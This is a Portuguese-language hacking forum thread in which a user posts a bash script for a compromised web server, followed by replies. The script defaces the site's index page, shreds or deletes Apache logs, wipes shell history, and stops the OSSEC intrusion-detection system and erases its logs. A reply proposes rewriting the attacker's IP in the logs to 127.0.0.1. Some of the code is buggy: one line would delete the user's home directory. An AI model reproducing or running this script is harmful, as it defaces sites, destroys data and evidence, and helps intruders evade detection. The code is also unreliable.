[Shell Script] Defaced by insanity ;)

Started by insanity, 23 de August , 2006, 06:14:18 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

insanity

23 de August , 2006, 06:14:18 PM
Esta um Script que eu fiz hoje, Nao e grande coisa ;)


Code Select
#!/bin/bash
#script development in GNU/SlackWare Linux
#author: Ins4n!7Y < insanity@hacker.am > member sh0k3rZ Crew

# rename index.php, index.* for index.html
if cd /var/www/htdocs/
then rename .php .htm index.html;
echo Sorry but, insanity hacked y0u > index.html #edit the line for hacked by "your nick here" ;)
else "dir not found"
fi
sleep 5

#shred - delete a file securely, first overwriting it to hide its contents

if cd /var/log/apache;
shred -n 70 -v -u access_log error_log
then echo "hey admin, where y0ur logs? ;)"

#remove logs if shred not found ;)

else rm -rf /var/log/apache/*.log
fi

sleep 5

#remove bash_history of user current
if rm -rf ~ .bash_history                                 
then echo "command history removed"
else echo " bash_history not found"
fi

sleep 5

# stop and remove log's Ossec HIDS
#for more information about Ossec HIDS visit: http://www.ossec.net

if [/var/ossec/bin/ossec-control start];
then echo "OSSEC HIDS found";
/var/ossec/bin/ossec-control stop;
rm -rf /var/ossec/logs/.*log
else echo"Ossec not found"
fi


#Greetz

#www.greenpeace.org ;)
#sh0kr3rZ Crew
#security darkers

ate mais

Wuefez

#1
05 de September , 2006, 06:10:49 AM
Oi, tudo bem?

Pelo que eu entendi o seu script vai e deleta os logs e faz mass deface,  pra fazer ele funcionar só estando com root mesmo, e hoje em dia ta quase impossivel de catar root, a idéia de remover os logs é boa porém toda vez que você rodar o script e desconectar vai ficar um log de você saindo (supondo que seja log de ssh essas coisas, log de erro/acesso do apache não) pra apagar ele você teria que conectar e rodar o script de novo e assim outro log ficaria quando você estivesse saindo certo? Um bom delogger seria aquele que não terminasse e ficasse deletando os logs indefinitivamente...

Uma idéia:

Por que você não faz um delogger assim, você coloca o seu ip ele vai nos logs e muda o seu ip para 127.0.0.1, assim quando do admin for todo feliz checar os logs pensando "ah se fudeu babaca otario, eu tenho meus logs aqui, mwheuheue" vai ver o ip da box dele e não vai entender nada, isso sim seria legal/engraçado.

falouzzz


"Quem fala não faz."

CripToGraFado

#2
05 de February , 2007, 06:55:50 AM
Desculpe o tom de "iguinorancia"...

Mais como que se executa esse exploit (bash) no windows ??

Perl??

Obrigado!

PS: Procurei em varios lugares e não achei! :(


insanity

#3
05 de February , 2007, 01:47:22 PM
Quote from: "CripToGraFado"Desculpe o tom de "iguinorancia"...

Mais como que se executa esse exploit (bash) no windows ??

Perl??

Obrigado!

PS: Procurei em varios lugares e não achei! :(

isso é executavel no GNU/Linux, basta salvar como: insanity .sh e dar permição de execução ( chmod +x insanity.sh )

Se fosse bash scripting  bastaria salvar insanity.bat

Se fosse Perl você teria que baixar o interpretador

e executaria:

perl insantiy.pl

nibbles

#4
06 de February , 2007, 12:27:51 PM
.bat = batch
bash é o shell do lin xP



"A diversão do inteligente é se fingir de burro para aquele que se finge de inteligente."
"ENGENHARIA SOCIAL. Porque não existe patch para a ignorância humana."
Print
Go Up Pages1
User actions